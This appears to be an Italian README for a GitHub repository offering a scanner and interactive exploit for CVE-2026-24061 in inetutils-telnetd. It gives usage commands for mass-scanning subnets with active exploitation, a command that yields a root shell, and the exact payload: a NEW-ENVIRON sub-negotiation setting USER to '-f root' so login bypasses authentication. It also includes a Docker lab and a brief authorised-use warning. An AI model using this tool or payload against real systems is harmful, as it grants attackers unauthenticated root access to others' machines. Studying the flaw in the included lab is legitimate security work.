
Scanner ed exploit interattivo per CVE-2026-24061 in inetutils-telnetd, che consente l'accesso root pre-autenticazione tramite negoziazione NEW-ENVIRON appositamente costruita. Include scansione multi-thread e laboratorio Docker.
👨💻 Autore: Furkan KAYAPINAR (@FurkanKAYAPINAR)
Questo repository contiene uno scanner di vulnerabilità e un exploit interattivo per CVE-2026-24061. Questa vulnerabilità colpisce inetutils-telnetd (e potenzialmente altre implementazioni Telnet) attraverso una gestione impropria dell'opzione Telnet NEW-ENVIRON, consentendo l'accesso remoto pre-autenticazione utilizzando il payload -f root.
--exploitinetutils-telnetd per test sicuri.Assicurati di avere Python 3.x installato.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Utilizzo
Scansiona i target per la vulnerabilità NEW-ENVIRON.
# Scansiona un singolo target
python3 scanner.py -t 192.168.1.100 -p 1903
# Scansiona una sottorete
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Scansiona un elenco di IP e tenta lo sfruttamento attivo (verifica RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
Ottieni accesso interattivo a una shell root.
python3 exploit.py -t 127.0.0.1 -p 1903
Distribuisci un ambiente locale vulnerabile per i test:
cd lab
docker-compose up -d --build
La vulnerabilità viene attivata durante la fase di negoziazione Telnet. Rispondendo alla richiesta DO NEW-ENVIRON del server con un pacchetto di sub-negoziazione IS VAR "USER" VALUE "-f root" appositamente costruito, il processo telnetd lato server viene indotto a passare il flag -f root al processo login, bypassando l'autenticazione.
[!WARNING]
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopo educativo. L'accesso non autorizzato a sistemi informatici è illegale e non etico.